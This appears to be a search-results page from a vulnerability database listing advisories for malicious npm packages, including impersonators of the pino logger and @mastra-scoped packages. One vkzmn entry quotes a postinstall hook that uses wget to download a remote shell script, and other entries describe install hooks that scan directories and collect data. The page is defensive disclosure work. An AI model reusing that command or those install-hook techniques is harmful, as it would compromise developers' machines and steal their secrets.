Lucene search
+L

1406 matches found

OSV
OSV
added 3 days ago5 views

MAL-2026-10566 Malicious code in sight-bind (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 398788014436c7e95df3045f9b32398c3de46b8c9275c0437e44bda1dcb6cc00 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 4 days ago7 views

Malicious code in abuden223 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16b3eb424174fa150faf06029c6808e9bb0e7e235b73c0b9fc8a6fe33e32fa8b The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...

6.2AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 4 days ago5 views

Malicious code in nottuff24 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 98d91c65c2ae847d5e741575bbc60ac69c0d2aca4973888c6ce2fc85daac3e30 The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...

6.2AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 4 days ago6 views

Malicious code in ratelimitsucks3 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5a45b50938677bb4c4bcdeee48af3fd57a8204d48d6aff16a1351ae814491391 The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...

6.2AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 4 days ago5 views

Malicious code in fflc-updated (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c0da486d000821631873ccd6fbb8eac17ee6dc94e8802946ef9d4cd288048e95 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSV
OSV
added 2026/07/07 4:19 p.m.6 views

MAL-2026-6951 Malicious code in whs4_npm (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47695d571fe82fbb4402e8cc7f56c05e1cb21d0bc8089ccbd8fca32f8cf5a57c The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSV
OSV
added 2026/07/07 3:13 p.m.7 views

MAL-2026-6923 Malicious code in notifier-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6a5846e3c26fdded8225d54ec017b01be255353470c39a780bbd9b556c059120 The package presents itself as a pino-compatible logger README, keywords, and a module.exports.pino alias mirror the pino identity, and lib/ replicat...

6.3AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/07 3:13 p.m.11 views

Malicious code in chai-chain-dom (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f1964693dd7c2bdd9ca7ae20eb441597571b1b78a689bd97648998c6442bda99 Package impersonates the pino logger exports module.exports.pino, README uses pino badge, keywords mimic pino but its actual behavior is a remote cod...

6.3AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/07 3:13 p.m.14 views

Malicious code in notifier-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6a5846e3c26fdded8225d54ec017b01be255353470c39a780bbd9b556c059120 The package presents itself as a pino-compatible logger README, keywords, and a module.exports.pino alias mirror the pino identity, and lib/ replicat...

6.3AI score
Exploits0References5
OSV
OSV
added 2026/06/30 2:10 p.m.6 views

MAL-2026-6678 Malicious code in ts-linting-builder (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c719aef78218f6b59b9f209c41eff610782c86c2ced5aeabe288218ac3c4f880 On npm install, the package's postinstall script test.js invokes routines in index.js that recursively scan the current working directory and the...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/29 4:53 p.m.9 views

Malicious code in @deel-core/client-payroll-onboarding-types (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 3dfba47c3f4cac91620ccf85b9ffb1923927bd4489f5a4710c89e1d693ac2e61 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/29 10:49 a.m.9 views

Malicious code in vkzmn (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/wormteste/raw/branch/main/downprocwork.sh -O d.sh...

6AI score
Exploits0References10
OSV
OSV
added 2026/06/24 9:32 p.m.16 views

MAL-2026-6403 Malicious code in @kl-dolphin/jump (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6b8f3b07b54ef6c2330673267757bff28f45494cbba5f6a71a78115a2a54f10b The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 4:3 p.m.8 views

Malicious code in cursorai-agent (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5a04af62bb8d9774dcd39cbe7f8864477b0813e5e0b19a45ad637e94dd8ae008 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/23 6:10 a.m.9 views

Malicious code in search-from-search (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 06e2e600c7cba50d7cc3cbff52a18f77e508ec66be3a50cd4960f84771598548 package.json registers node callback.js as both preinstall and postinstall, so the payload runs automatically on npm install. callback.js collects th...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/17 5:9 a.m.10 views

Malicious code in @mastra/voice-elevenlabs (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f99d987467406ef04c81d4437451d8ba5f38649e85437a361470bb9fd94fbe53 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/17 5:6 a.m.10 views

Malicious code in @mastra/google-cloud-pubsub (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f1bd3f8519d6016a066d4268dae0e9c0d20ca87350cc759832b6053128a5b8d8 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

5.9AI score
Exploits0References2
OSV
OSV
added 2026/06/17 5:6 a.m.7 views

MAL-2026-6039 Malicious code in @mastra/temporal (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 214be711b41a8883e3252f0e9e41bc902d62da7650334b2efdc7424194989101 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSV
OSV
added 2026/06/17 3:12 a.m.10 views

MAL-2026-5961 Malicious code in @mastra/rag (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 031ec31035fa78e914e64884be3019150c8f1f77b9c464bce74e63cb0cd13227 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
OSV
OSV
added 2026/06/17 3:12 a.m.8 views

MAL-2026-5962 Malicious code in @mastra/s3 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 69bd7442a33e88350e5a804e238625a967b16df137b4b1623cd6a0587d25dc21 The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...

6.1AI score
Exploits0References2
Rows per page
Query Builder